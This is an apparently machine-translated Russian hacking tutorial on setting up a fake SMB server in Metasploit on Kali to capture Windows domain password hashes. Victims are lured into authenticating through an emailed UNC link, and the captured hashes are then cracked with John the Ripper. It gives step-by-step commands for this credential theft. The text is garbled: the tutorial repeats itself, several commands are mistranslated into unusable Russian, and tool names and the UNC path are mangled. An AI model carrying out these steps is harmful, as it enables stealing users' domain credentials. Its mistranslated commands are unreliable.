В предыдущих уроках мы узнали, как украсть системные токены, которые можно использовать для доступа к ресурсам, как использовать hashdump для извлечения хешей паролей из локальной системы и как получить хеши паролей из локальной системы и взломать их.
В каждом из этих случаев хэши паролей представляли собой пароли пользователей локальной системы, а не домена. Если система входит в домен (что характерно для большинства корпораций и крупных организаций), пароли, скорее всего, хранятся на контроллере домена (DC). Как получить пароли домена, не атакуя защищённый контроллер домена?
Одна из наиболее мощных функций Metasploit — это возможность создания поддельного SMB-сервера. Это означает, что при попытке доступа к SMB-серверу система должна будет предоставить учётные данные в виде хеша пароля домена. В крупных сетях часто используется система, которая систематически подключается к каждой машине, чтобы проверить наличие обновлений и безопасность. При этом она должна предоставить свои учётные данные каждой системе, и обычно это будет пароль администратора. Если проявить терпение, это может оказаться оптимальной стратегией.
Кроме того, настроив этот поддельный SMB-сервер, мы сможем перехватывать учётные данные домена при попытке пользователей пройти аутентификацию. Мы могли бы отправить целевой странице встроенный UNC-путь, и когда пользователь нажмёт на него, мы могли бы перехватить учётные данные домена.
В отличие от некоторых других наших атак Metasploit, эта уязвимость не является ни эксплойтом, ни полезной нагрузкой. Это вспомогательный модуль, способный захватить хеш в формате, который можно взломать с помощью Cain and Avel или John the Ripper.
kali > msfconsole
msf > использовать вспомогательный/сервер/захват/smb
Теперь, когда мы загрузили этот модуль, давайте рассмотрим параметры, которые нам необходимо настроить для использования этого модуля.
msf >показать параметры
Как видите, этот модуль имеет множество опций, но мы можем оставить настройки по умолчанию для каждой из них, за исключением типа файла для хранения хешей для взлома.
Обратите внимание, я выделил выше параметр JOHNPWFILE. Также на самом верху есть параметр CAINPWFILE. Эти параметры позволяют определить формат файла, в котором хранятся хеши для взлома Каином и Авелем или Иоанном Потрошителем. В этом руководстве я буду использовать последний инструмент.
Для этого мне просто нужно указать этому модулю «установить» JOHNPWFILE в определенном месте, введя:
msf > set JOHNPWFILE /root/domainhashes
Теперь осталось только «эксплуатировать».
msf > эксплуатировать
Когда мы набираем «exploit», этот модуль запускает поддельный SMB-сервер, который будет сохранять предоставленные учетные данные в каталоге /root в файлах, начинающихся с «johnhashes».
net use \192.168.1.106occumptheweb
Когда они нажмут на эту ссылку, их учетные данные домена будут представлены нашему SMB-серверу и сохранены, как показано на снимке экрана ниже.
кали > cd /root
Как видите, здесь хранятся два хеша. Чтобы их взломать, можно воспользоваться John the Ripper, набрав:
kali > john johnhashes_netlmv2
Когда мы это делаем, Джон Потрошитель загружает хеш пароля, распознает тип хеша и начинает его взламывать.
В каждом из этих случаев хэши паролей представляли собой пароли пользователей локальной системы, а не домена. Если система входит в домен (что характерно для большинства корпораций и крупных организаций), пароли, скорее всего, хранятся на контроллере домена (DC). Как получить пароли домена, не атакуя защищённый контроллер домена?
Одна из наиболее мощных функций Metasploit — это возможность создания поддельного SMB-сервера. Это означает, что при попытке доступа к SMB-серверу система должна будет предоставить учётные данные в виде хеша пароля домена. В крупных сетях часто используется система, которая систематически подключается к каждой машине, чтобы проверить наличие обновлений и безопасность. При этом она должна предоставить свои учётные данные каждой системе, и обычно это будет пароль администратора. Если проявить терпение, это может оказаться оптимальной стратегией.
Кроме того, настроив этот поддельный SMB-сервер, мы сможем перехватывать учётные данные домена при попытке пользователей пройти аутентификацию. Мы могли бы отправить целевой странице встроенный UNC-путь, и когда пользователь нажмёт на него, мы могли бы перехватить учётные данные домена.
В отличие от некоторых других наших атак Metasploit, эта уязвимость не является ни эксплойтом, ни полезной нагрузкой. Это вспомогательный модуль, способный захватить хеш в формате, который можно взломать с помощью Cain and Avel или John the Ripper.
Шаг 1: Запустите Kali и Metasploit
Давайте начнем с запуска Kali и откроем один из моих любимых хакерских инструментов, Metasploit , введя:kali > msfconsole
Шаг 2: Настройка SMB-сервера
Теперь, когда Metasploit открыт, давайте настроим поддельный SMB-сервер. В отличие от некоторых других наших атак Metasploit, эта не является ни эксплойтом, ни полезной нагрузкой, а скорее вспомогательным модулем. Запустить её можно, набрав:msf > использовать вспомогательный/сервер/захват/smb
Теперь, когда мы загрузили этот модуль, давайте рассмотрим параметры, которые нам необходимо настроить для использования этого модуля.
msf >показать параметры
Как видите, этот модуль имеет множество опций, но мы можем оставить настройки по умолчанию для каждой из них, за исключением типа файла для хранения хешей для взлома.
Обратите внимание, я выделил выше параметр JOHNPWFILE. Также на самом верху есть параметр CAINPWFILE. Эти параметры позволяют определить формат файла, в котором хранятся хеши для взлома Каином и Авелем или Иоанном Потрошителем. В этом руководстве я буду использовать последний инструмент.
Для этого мне просто нужно указать этому модулю «установить» JOHNPWFILE в определенном месте, введя:
msf > set JOHNPWFILE /root/domainhashes
Теперь осталось только «эксплуатировать».
msf > эксплуатировать
Когда мы набираем «exploit», этот модуль запускает поддельный SMB-сервер, который будет сохранять предоставленные учетные данные в каталоге /root в файлах, начинающихся с «johnhashes».
Шаг 3: Поделиться
Теперь, когда наш SMB-сервер запущен, нам нужно, чтобы кто-то попытался войти в наш общий ресурс. Мы можем сделать это, отправив UNC-ссылку на наш общий ресурс, например:net use \192.168.1.106occumptheweb
Когда они нажмут на эту ссылку, их учетные данные домена будут представлены нашему SMB-серверу и сохранены, как показано на снимке экрана ниже.
Шаг 4: Взломать хэш
Последний шаг — взломать хеши для получения пароля. Перейдите в каталог /root, чтобы найти сохранённые файлы хешей.кали > cd /root
Как видите, здесь хранятся два хеша. Чтобы их взломать, можно воспользоваться John the Ripper, набрав:
kali > john johnhashes_netlmv2
Когда мы это делаем, Джон Потрошитель загружает хеш пароля, распознает тип хеша и начинает его взламывать.
